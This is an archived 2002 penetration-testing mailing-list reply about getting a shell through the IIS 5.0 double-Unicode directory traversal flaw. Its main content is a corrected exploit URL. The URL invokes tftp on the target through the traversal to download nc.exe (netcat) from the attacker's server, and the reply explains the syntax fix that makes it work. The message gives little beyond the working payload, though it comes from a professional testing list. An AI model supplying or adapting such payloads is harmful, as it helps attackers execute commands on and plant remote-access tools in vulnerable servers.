RE: Can't get a shell

From: Coral J. Cook (cjcook@nosc.mil)
Date: Thu Jul 11 2002 - 14:54:12 EDT

• Next message: Glenn Larsson: "Re: Default passwords for TSO and CICS ?"
• Previous message: Bill Pennington: "Re: escalating IUSR to admin rights via unicode and iis4"
• In reply to: Gaziel, Avishay: "Can't get a shell"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

> -----Original Message-----
> From: Gaziel, Avishay [mailto:agaziel@kpmg.com]
> Sent: Tuesday, July 09, 2002 9:33 AM
> To: PEN-TEST@securityfocus.com
> Subject: Can't get a shell
>
>
> Hi All,
> Situation:
> An IIS5.0 vulnerable to unicode.("double Unicode" i.e. ..%255c.. etc.)
> IIS sitting behind a firewall.
> Problem:
> host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+my
> server+get+nc.exe doesn't work

Here is the correct format:

host/scripts/..%255c.........../winnt/system32/tftp?+"-i"+myserver+GET+nc.ex
e

notice that cmd.exe is removed and that -i is quoted "-i"
that should fix your problem

R,
Coral

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: Glenn Larsson: "Re: Default passwords for TSO and CICS ?"
• Previous message: Bill Pennington: "Re: escalating IUSR to admin rights via unicode and iis4"
• In reply to: Gaziel, Avishay: "Can't get a shell"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:23 EDT